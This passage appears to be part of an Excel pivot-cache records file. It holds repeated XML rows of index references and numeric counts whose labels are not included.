  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="367"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="367"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="368"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="368"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="368"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="368"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="369"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="369"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="369"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="369"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="369"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="369"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="369"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="369"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="369"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="369"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="369"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="369"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="369"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="369"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="355"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="355"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="370"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="370"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="370"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="370"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="370"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="370"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="370"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="370"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="370"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="370"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="370"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="370"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="370"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="370"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="371"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="371"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="371"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="371"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="371"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="371"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="371"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="371"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="15"/>
    <x v="371"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="371"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="371"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="371"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="371"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="371"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="372"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="372"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="372"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="372"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="372"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="372"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="372"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="372"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="372"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="372"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="372"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="372"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="8"/>
    <x v="372"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="372"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="373"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="373"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="373"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="373"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="373"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="373"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="65"/>
    <x v="373"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="16"/>
    <x v="373"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="9"/>
    <x v="373"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="13"/>
    <x v="373"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="183"/>
    <x v="373"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="322"/>
    <x v="373"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="373"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="373"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="374"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="374"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="374"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="374"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="374"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="374"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="374"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="374"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="374"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="374"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="29"/>
    <x v="374"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="139"/>
    <x v="374"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="374"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="374"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="375"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="375"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="375"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="11"/>
    <x v="375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="375"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="375"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="375"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="8"/>
    <x v="375"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="56"/>
    <x v="375"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="67"/>
    <x v="375"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="375"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="376"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="376"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="376"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="376"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="376"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="376"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="376"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="376"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="376"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="376"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="69"/>
    <x v="376"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="402"/>
    <x v="376"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="376"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="376"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="377"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="377"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="377"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="377"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="377"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="377"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="18"/>
    <x v="377"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="377"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="377"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="377"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="377"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="377"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="377"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="377"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="378"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="378"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="378"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="378"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="378"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="378"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="378"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="378"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="378"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="378"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="378"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="378"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="378"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="378"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="379"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="379"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="379"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="379"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="379"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="379"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="379"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="379"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="379"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="379"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="379"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="379"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="379"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="379"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="379"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="379"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="379"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="380"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="380"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="380"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="380"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="381"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="381"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="381"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="381"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="381"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="381"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="381"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="381"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="381"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="381"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="50"/>
    <x v="381"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="70"/>
    <x v="381"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="381"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="381"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="382"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="382"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="382"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="382"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="382"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="382"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="382"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="382"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="382"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="382"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="382"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="382"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="382"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="382"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="383"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="383"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="383"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="383"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="384"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="384"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="384"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="384"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="384"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="384"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="384"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="384"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="384"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="384"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="384"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="384"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="12"/>
    <x v="384"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="384"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="385"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="385"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="385"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="385"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="31"/>
    <x v="385"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="22"/>
    <x v="385"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="385"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="27"/>
    <x v="385"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="385"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="385"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="60"/>
    <x v="385"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="281"/>
    <x v="385"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="385"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="385"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="386"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="386"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="386"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="386"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="386"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="386"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="386"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="386"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="386"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="386"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="386"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="386"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="386"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="386"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="387"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="387"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="387"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="387"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="387"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="387"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="387"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="387"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="387"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="387"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="14"/>
    <x v="387"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="387"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="387"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="387"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="388"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="388"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="388"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="388"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="388"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="388"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="388"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="388"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="40"/>
    <x v="388"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="388"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="388"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="388"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="388"/>
  </r>
